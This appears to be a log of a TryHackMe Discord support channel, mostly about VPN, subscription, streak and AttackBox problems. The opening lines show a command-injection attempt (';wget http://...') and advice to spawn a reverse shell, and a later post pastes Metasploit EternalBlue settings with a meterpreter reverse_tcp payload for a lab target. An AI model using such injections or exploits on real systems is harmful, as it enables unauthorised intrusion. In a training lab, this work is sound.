now that doesn't work anymore, so I tried typing ";wget "http://......" in the input box, but that doesn't work either.

Any ideas?

plush bay
#

if you can run hostname and whoami try something like a bash or python reverse shell

#

i.e if you got command execution a php reverse shell is not the way forward

#

generally

naive dust
#

Oh so should i get a premade file similar to the php reverse shell from pentestmonkey?

#

but for python this time

plush bay
#

facedesk

#

no not a file

#

a command

naive dust
#

i downloaded revshellgen

#

is that okay?

plush bay
#

doubt it

#

just run a command to spawn a shell

#

can't really give them here as examples without possibly getting yelled at

naive dust
plush bay
naive dust
#

okay thank you

plush bay
#

it even has easy to change ip and port parts

#

and what the listerner command would be

naive dust
scenic torrentBOT
#

Gave +1 Rep to @plush bay

plush bay
#

no problem

arctic iris
#

Hello, quick question about subscriptions. Is there any way to purchase a subscription code at a student discount? I'm assuming no, since the system doesn't know who will be redeeming the code at the time it is purchased, but just wanted to check. Thanks!

weary spindle
visual night
#

I purchased a premium membership, trying 3 times to pay for it. All 3 transactions came out of my bank account and I still donโ€™t have access to premium. I contacted support 7 days ago with absolutely no response. Iโ€™m beyond irritated and want this fixed. Does anyone here work directly for Tryhackme?

weary spindle
bronze vale
fervent spire
#

Yo Someone please help I'm in the Brainstorm ctf room is it safe to run the exe file on my orginal machine or do i have to set up a test machine

weary spindle
#

Immunity debugger?

vale musk
#

My THM vpn on Windows worked earlier today but at some point it stopped working, no connection to any 10.10.x IP's, tried multiple different boxes. Also I see a keepalive_timeout every 2 minutes in my openvpn client log when connected to either EU-VIP-1 or EU-VIP-2 endpoints. Other non-THM VPN connections in my OpenVPN client work fine. Rebooted windows, no change.

tribal burrow
vale musk
#

Nope, it can't open a connection on TCP443 at all it seems

tribal burrow
#

also ping -c 3 10.10.10.10 do you have lost packets or ?

vale musk
#

yes nothing is going through, all time out

#

probably also why the keepalives of the vpn connection itself also timeout

tribal burrow
#

no other vpn connection active ? meaning no vpn stacking

vale musk
#

nop, only THM

#

network unchanged as well compared to when it was working earlier today

tribal burrow
#

try regenerate vpn file?

vale musk
#

tried that, no change

#

(just did)

weary spindle
#

It's might be the gui error

vale musk
#
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1     192.168.1.13     25
        10.10.0.0      255.255.0.0        10.11.0.1      10.11.47.51   1001
        10.11.0.0      255.255.0.0         On-link       10.11.47.51    257
      10.11.47.51  255.255.255.255         On-link       10.11.47.51    257
    10.11.255.255  255.255.255.255         On-link       10.11.47.51    257
tribal burrow
#

if you have some linux/kali in VM, try from there

vale musk
#

routes are being added

#

will try it in a vm

tribal burrow
vale musk
#

feels like some adaptive firewall thingy decided to drop all traffic for the vpn at some point, frustrating

tribal burrow
#

windows =/ hehe

vale musk
#

well vpn to my own box works like a charm, so its probably something specific to the connection method that THM uses for their ovpn profile then ๐Ÿ™‚

weary spindle
#

Which country are you in?

vale musk
#

Netherlands

tribal burrow
vale musk
#

What do you mean?

tribal burrow
#

sry mi bad. ignore that

#

i can't tell for windows since im not using it. but as some from nl also i never har issue using linux

crisp osprey
#

Anyone have idea of resolving country flag issue? I have tried many things but not working

weary spindle
#

Windows OpenVPN isn't very good.

weary spindle
proven nymph
#

Hey guys, i cant reach thm machines with VPN on,
1.openvpn session is successfull according to the site.
2.already tried reloading conf file on different servers.
3. routing table seems ok.
i am with vpn on my VM and trying to ssh to the machine on Metasploit: Exploitation msfvenom part, this machine does not reply to ping as well - earlier i was in another room and couldnt nmap a machine that responded to a scan from the attack box.
Thanks to any helpers

sharp bisonBOT
plush bay
#

try that and see if it finds anything

proven nymph
#

MTU value failed at 1000, aborting MTU check

#

happens again after reloading another config file

plush bay
#

okay then that is weird

cloud helm
#

Hey Guys, I subscribed for Tryhackme premium but my account isn't activated yet, the money got deducted it's been more than 10days can somebody help ?
Thank You.

#

Also raised a ticket still no response

tribal burrow
weary spindle
tribal burrow
#

fair yea...

cloud helm
#

But I raised it on july 14

proven nymph
kind fox
vale musk
weary spindle
tawny kiln
#

any chance someone could help me w some issue connecting the enumeratingAD Room?

plush bay
#

yuups

tawny kiln
#

im connected to the vpn just fine, and when i run nslookup thmdc.za.tryhackme.com it resolves to the DC IP as it should

plush bay
#

hmmm

tawny kiln
#

so

#

idk

plush bay
#

is it the first entry or do you have some other dns entry above it???

tawny kiln
#

search za.tryhackme.com nameserver 10.200.68.101

#

2 more below it

#

should i try removing the 2 other dns servers i have in there temporarily?

plush bay
#

nah that should be fine then

#

well can't do much more then recommend trying the vpn script or trying other subnets of the network by leaving and rejoining

#

!vpnscript

sharp bisonBOT
tawny kiln
#

gotcha thank u

plush bay
#

hope you can fix

kind fox
#

is it just for me that the subscription is not working?

plush bay
#

ยฏ_(ใƒ„)_/ยฏ

strong seal
#

I am currently in the "Walking and Application" section of the site, and when I try to access the website listed via the virtual machine, I keep getting a 504 Gateway Time-Out. Am I doing something wrong?

thick ginkgo
strong seal
#

Thank you

weary spindle
#

Or is that 405 ๐Ÿค”

strong seal
#

I used the VPN and it worked fine.

marble horizon
oak kiln
#

Hi,
the tickets for the Red Teaming path won't be provided anymore, right?

plush bay
#

yuups if things work as intended

oak kiln
#

mhh ok, I hope there might be another chance to get the title, or even better a Blue Teamer title in the future ๐Ÿคฉ

storm sun
#

I cant join a room, when i press join room i get redirected to a overview of my completed rooms

storm sun
plush bay
#

depends on what you need help with

plush bay
#

!docs verify

sharp bisonBOT
plush bay
#

can you then post a screenshot of the process or a gif

storm sun
#

idk how i would even create a gif XD

#

but ill do

#

oh what

plush bay
#

the !verify command goes in a direct message/private message to the bot

storm sun
#

i have to dm the bot

plush bay
#

yuups

storm sun
#

shit i dmd you

#

;-;

#

dont steal me pls XD

#

oh damn wrong bot

#

bruh why is this so hard

#

lmao

plush bay
#

no worries

storm sun
#

ok so i press here and that takes me here

plush bay
#

hmm weird

storm sun
#

ye

#

and i need to join the room to play it

plush bay
#

@cold fog any clue why the breaching AD network would redirect to the my rooms page when trying to join it??? ah never mind... @storm sun you need a 7 day streak to join the network unless you are a subscriber

storm sun
#

bruh what...

#

it doesnt say that anywhere

plush bay
#

on the learn page

#

if you scroll down to the networks on the learn page it tells you this

storm sun
#

oh

#

ye i dont have that

#

i have only today

#

so i have to wait basically a week then

plush bay
#

yuup

storm sun
#

i wanted to do the new room

#

but it says i need this room for knowledge

plush bay
#

aaah well the acitve directory basics room might cover enough stuff to get you started for #1133413669288546456

storm sun
#

ok ill just go for it then

#

and do this when i get the streak

plush bay
storm sun
#

they should make it more obvious tho

#

ye i already did that room

plush bay
#

yuup enjoy and happy learning

storm sun
#

thank you!

plush bay
#

shadow is happy in their image spotting to have noticed your streak number and not being a subscriber causing this problem

storm sun
#

XD fr

#

and also even spotting that you need a streak

#

and why can i not RDP into the newest room?

#

nvm ijust had to wait and try again

#

wait no am i even supposed to RDP into it?

plush bay
#

probably

#

kinda hard to do any practical learning and hardening without using rdp or ssh

storm sun
#

ok i got it now yes, i just had to wait longer XD

vale musk
#

I'm opening THM in a vanilla kali installation in firefox, and for some pages it partially loads the page and then gets stuck on various 3rd party elements like google analytics, gravatar, etc. Anybody encountered this before? The rest of the site doesn't seem to load at that point so I can't really use THM this way

#

Waiting for region1.analytics.google.com.... is all it says in the status bar

#

Tried installing adblocker addon in firefox to see if that helps but it doesn't seem to affect it.

#

After a few minutes of waiting it seems to timeout on those elements and then suddenly the page appears.

#

This shows the 2-3min loading time in the network requests list

coral salmon
#

hi so im using openvpn to connect to a machine, but whenever i try to use metasploit, it gives me the error: ```
[-] 10.10.131.248:445 - Rex::ConnectionRefused: The connection was refused by the remote host (10.10.131.248:445).
[*] 10.10.131.248:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.131.248:445 - The target is not vulnerable.

these are my options:

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description


RHOSTS 10.10.131.248 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description


EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.96.108 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name


1 Windows 7

#

the rhosts ip is set to the ip at the top of the webpage (the remote ip) and my lhosot is set to my vpn ip port 4444 is also available on my machine

#
PING 10.10.131.248 (10.10.131.248) 56(84) bytes of data.
64 bytes from 10.10.131.248: icmp_seq=1 ttl=63 time=172 ms
64 bytes from 10.10.131.248: icmp_seq=2 ttl=63 time=151 ms
64 bytes from 10.10.131.248: icmp_seq=3 ttl=63 time=259 ms
64 bytes from 10.10.131.248: icmp_seq=4 ttl=63 time=152 ms
64 bytes from 10.10.131.248: icmp_seq=5 ttl=63 time=210 ms

When i ping, it works but in the exploit attempt it refuses.
Also I am in the metasploit intro page

weary spindle
#

Which room are you doing?

coral salmon
#

Also my machine is running kali linux if that matters

marble horizon
weary spindle
#

No, you're not able to clone any of the THM machines.

weary spindle
coral salmon
weary spindle
#

I wasn't able to do yours, but I booted up a machine and got it.

Just need to wait.

coral salmon
#

still doesnt work

#

wait am i using the right ip?

#

is it supposed to be the attackbox ip

#

if no, which ip

weary spindle
#

RHOST is target.

LHOST is your machine.

#

So if it's attackbox, ens5.
VM - tun0

#

RHOST = 10.10.131.28

#

For me

coral salmon
weary spindle
#

ip a s

coral salmon
#

okay with the machines ip (for me its 10.10.86.113) even ping doesnt work

weary spindle
#

Will show you all your interfaces and their ip.

carmine fjord
#

how can I acces my kali machine if I have premium?

weary spindle
coral salmon
#

BRUH, i set lhost to my vpn ip, not to tun0

weary spindle
#

Are you on your own Kali machine?

#

Or attackbox?

carmine fjord
#

attackbox. I can't acces it in a separate tab for example?

carmine fjord
#

thanks! you think i should change to vm or dual boot with kali?

weary spindle
#

Vm.

inner parcel
#

Hello

zealous yoke
scenic torrentBOT
#

Gave +1 Rep to @inner parcel

zealous yoke
#

Is this with any room or just breachingad?

inner parcel
#

Just breachingad

zealous yoke
# inner parcel Just breachingad

Ah okay, so taking a look, your streak is "1". You need to have a streak of at least 7 or be subscribed to THM to access networks such as breachingAD. The networks show their entry requirements ๐Ÿ™‚

inner parcel
#

Ohhh got it, thank you!

zealous yoke
#

There used to be a pop-up that would say that if you aren't eligible, but it doesn't seem the be displaying anymore. I'll pass that along internally:)

inner parcel
#

Okay. Glad to help

slow sentinel
#

heey

#

openvpn is giving this error msg WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set. 2023-07-26 14:38:06 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.

#

i tried to change chipher to data ciphers but didn t work
any solution ?

marsh magnet
slow sentinel
#

ye

zealous yoke
plush bay
#

it is up to the room creator to accept and get those added... hence if the room is very old it might not get new writeups/walkthroughs accepted

wet hound
#

I got an email that my payment didnt go through. If I click Pay now, I get "Your order URL has expired. Please try again.". I can't reorder it myself because I was still on the old $10 per month.

ornate elbow
#

Hello guys an girl, I am a new cammer in You're chat, nice to meet you all in this chat, in this chat history I just want to see and learning and try to learn to fix and training with support may skills, I hope we can work togetherยฒ getherยฒ ๐Ÿ˜Š

signal breach
#

anyone else having connection issues? the vpn keep restarting when I start it and the attack box fails to connect as well

lone shard
#

hello everyone where can i address a challenge concerning streaks please

halcyon mountain
#

Hi there, I have a trouble connecting to the VPN. Ping to the 34.253.19.14 is successful.

weary spindle
halcyon mountain
halcyon mountain
oak kiln
#

are there any plans on fixing task 10 of Evading Logging and Monitoring?

crisp osprey
#

Any THM admin , mod here I am having problem in my country flag it's showing wrong flag and I try all methods still showing same

weary spindle
stone panther
#

I just reinstalled openvpn to the latest version

#

I cant get this thing to run

#
2023-07-27 07:37:02 ERROR: Failed to apply push options
2023-07-27 07:37:02 Failed to open tun/tap interface```
#

apparently I have to add a cipher but I dont know how

#

@weary spindle

stone panther
#

my command was sudo openvpn file.ovpn

woeful hedge
muted mason
#

also, threes a cours/path/whatever in THM that covers conencting with vpn is three? or am I mistaken?

stone panther
#

You mean ```Please ensure you are not using the OpenVPN GUI or Network Manager.
Use the command-line interface to connect to the OpenVPN service.

If you are on MacOS, you may need to use Homebrew to install OpenVPN; brew install openvpn

If you are on Linux, please use your default package manager. For Ubuntu it is apt, sudo apt install openvpn.``` ? @woeful hedge

woeful hedge
#

No, there is a pin that goes over your issue

muted mason
#

but yeah a quick google or even chat gpt will goive info:


So, the line should look something like this:

--data-ciphers AES-256-CBC:AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305

This tells your OpenVPN client to use AES-256-CBC as well as the other ciphers it was already using, allowing it to connect to servers that use any of these ciphers.```
#

but the tun issue thats a perms issue. are you sure youre properly suding? maybe reistall openvpn

#

Honest answer, I feel like youve come here for help without trying to research or fix it first. which isnt the way round you should be doing it

#

the ping:

 Replace the cipher AES-256-CBC line in your .ovpn config with data-ciphers AES-256-CBC

To do this, you can use the text editor of your choice, or simply type nano filename.ovpn into your terminal.
Make sure not to edit anything else, and save it with the same file name.

Then, re-run the VPN with openvpn filename.ovpn. Let me or any of our community mentors know if these steps have not worked for you and we will troubleshoot further.```
woeful hedge
muted mason
#

the issue is I dont think hes done any research first and jumped straight to asking for help

stone panther
#

ive done research and chat gpt was as useless as you sadly @muted mason

#

I dont see a config file in my openVPN folder

#

I found a workaround but I wanna do the pinned thingy

muted mason
woeful hedge
muted mason
bronze vale
#

Leon, please stop being rude to community members

stone panther
#

and I cant do neither cuz I cant find the config file @muted mason

#

what a clown, jesus

muted mason
woeful hedge
#

I am not "your guy". You can reply without the ping

muted mason
#

but when theres a few people speaking need to make sure the right person gets the right message.

marble breachBOT
#

:mute: leonteale#0 has been muted.

woeful hedge
#

When you select reply, there is a little @ symbol over to the right. If you deselect it, it replies to the message but does not ping the user.

woeful hedge
bronze vale
#

By the way, we do not tolerate retaliation here.
I don't care who started it, if someone is being rude or aggressive please ping a moderator and wait for them to respond.

Don't bother entertaining them because you will end up being punished equally.

#

What VPN server are you using @stone panther

stone panther
#

all the posts I found refferenced the ovpn config file which I cant find @woeful hedge

#

OpenVPN @bronze vale

bronze vale
#

VPN server on the website

stone panther
#

oh yeah I downloaded the one off of thm

#

but I use openvpn to connect

bronze vale
#

Which server

woeful hedge
#

Which directory did you download it to?

stone panther
#

openVPN? @woeful hedge or the thm vpn file?

#

I dont know how to get to that window all I see is @bronze vale

bronze vale
#

Wait 2 minutes, then press download

woeful hedge
#

The client

bronze vale
#

Then re-run the openvpn command, sudo openvpn file.ovpn but make sure you use the downloaded file and not the old openvpn config

stone panther
#

EU-regular-3 it says

bronze vale
#

press the blue regenerate button

stone panther
#

now it works @bronze vale thanks

scenic torrentBOT
#

Gave +1 Rep to @bronze vale

bronze vale
#

Yw:)

muted mason
boreal swallow
muted mason
#

see if we can figure it out

boreal swallow
#

I have tried various edits for this line from the web but to no connection was established

#

what should I edit the ciphers line to?

boreal swallow
muted mason
boreal swallow
#

I read the whole thing but all of it failed

tribal burrow
boreal swallow
boreal swallow
tribal burrow
#

can you show the whole. even last lines

weary spindle
#

Regen your configuration.

boreal swallow
tribal burrow
boreal swallow
tribal burrow
#

and update/upgrade and dist-upgrade os

boreal swallow
#

this is from EU-Regular-1

tribal burrow
#

this is bit over my knowledge. when some mod or so jumps in will help you

scenic torrentBOT
#

Gave +1 Rep to @tribal burrow

weary spindle
boreal swallow
#

I tried IN-Regular-1

weary spindle
boreal swallow
weary spindle
boreal swallow
#

same error

weary spindle
#

Do you have a VPN active?

Are you on your home network?

boreal swallow
#

I on my institute network

weary spindle
#

That could be why.

#

They might be blocking port 1194.

boreal swallow
weary spindle
#

They might unblock

boreal swallow
weary spindle
#

Bingo ๐Ÿ˜„

boreal swallow
#

I will ask them to change it, thank you sir
I will contact you again if the issue persists after they change the settings

naive dust
#

Is there a way to make attackbox not unusably slow? I get that I can instead use a vm and openvpn, but THM says attackbox is recommended yet it lags like Iโ€™m connecting to a server on a different planet.

weary spindle
#

Are you a free user? they have slower machines.

#

I've never experienced lag with the Attackbox

naive dust
#

Nope. Subscribed this morning.

#

9 seconds for terminal to open from the time of clicking. Another 11 seconds before being able to input text.

#

Typed in SSH command and the whole thing didnโ€™t appear until 21 seconds after typing.

crisp osprey
#

Anybody have idea how to solve the flag issue I tried many things but not worth it

crisp osprey
tribal burrow
#

hmm... without all vpn try check on some online site you region to check will it show correct one

tribal burrow
#

try logout of thm and clear cache and relogin

crisp osprey
tribal burrow
#

hmm... did you try login on host os to thm and then click the link ?

crisp osprey
#

I even raised a ticket but it's been 6 days no reply from THM team

weary spindle
#

Reply is currently 6-8 days

tribal burrow
#

oh... might need some time. lots of work from they side

crisp osprey
crisp osprey
tribal burrow
#

then i rly no idea. if is not something of high importance wait for a day or two more

fast robin
#

guys im trying to connect to a machine using an attackbox and it gives the error
permission denied(publickey)
i've even tried using openvpn on different machines of my own and it still gives the same error.
idk if this is the corret channel to ask for this question

crisp osprey
tribal burrow
#

they will do...

weary spindle
fast robin
weary spindle
fast robin
#

no like i enter this command int he terminal on the attackbox : ssh tryhackme@machineip

weary spindle
#

You need to read all task information.

weary spindle
fast robin
#

i have tried it with the user given on top as well

weary spindle
#

You can't SSH in to all THM machines.

fast robin
weary spindle
#

It literally tells you in the task.

fast robin
#

Oh wait-

#

My bad.

#

I thought you had to connect to the machine using the terminal like in the previous tasks

weary spindle
#

Nah, some rooms you just need the ip to visit the web page

fast robin
#

Thanks alot mate.

naive dust
weary spindle
naive dust
#

Thereโ€™s literally nothing support can do if the product theyโ€™re supporting isnโ€™t functioning?

weary spindle
#

It is though?

naive dust
#

Iโ€™ve been attempting to start a web server via python for 35 minutes.

#

Zero functionality.

weary spindle
#

Syntax?

naive dust
#

Python3 -m http.server

#

Syntax isnโ€™t the issue. The box is unresponsive at this point no matter how many times I terminate and reopen.

#

And now I have a solid black screen in place of my attackbox.

tribal burrow
#

you go to local folder from where you wish start py serv and run comman. the terminal will look non responding
but is working

naive dust
#

I do not have a terminal now. I have a solid black screen.

weary spindle
#

!docs verify

sharp bisonBOT
weary spindle
#

Can you verify and take a screenshot?

glad oyster
#

How's your internet connection?

naive dust
naive dust
glad oyster
naive dust
# glad oyster And latency?

I had 2 servers and 8 VM's all running simultaneously 20 minutes ago without issues while practicing some OSED prep stuff. Promise internet is not the issue.

glad oyster
#

I'm just ruling out all possibilities

tribal burrow
#

might help

naive dust
#

its not an issue of getting a cconnection to a web server. That was my example fo rthe fact that it was lagging and then got so bad that after 30 minutes one command couldnt execute

weary spindle
#

But the python seerver just sits there.

#

It only shows an interaction when you try to wget etc.

tribal burrow
#

py serv is looking like hanging but it works

naive dust
#

I'm not sure where the confusion is coming from on your end. When I press keys on my keyboard, they do not show up on the screen. If I type "python" what shows up is " " (nothing). It can't even get to where it hangs, because it is freezing. If I right click on my desktop to open a new terminal, nothing happens. Again, because everything is just frozen. To reiterate, this is not a web server issue. It is attackbox not functioning in any way, shape, or form.

#

I understand that py serv looks like its hanging when theres a connection

#

I understand that nothing happens until you wget

weary spindle
#

Screnshot?

naive dust
#

this is what attackbox looks like for me.

weary spindle
#

Have you tried to terminate and reboot?

naive dust
#

yes, this was my 4th iteration.

#

And Ive done it so far on chrome, edge, and also in Kali just in case for some freak reason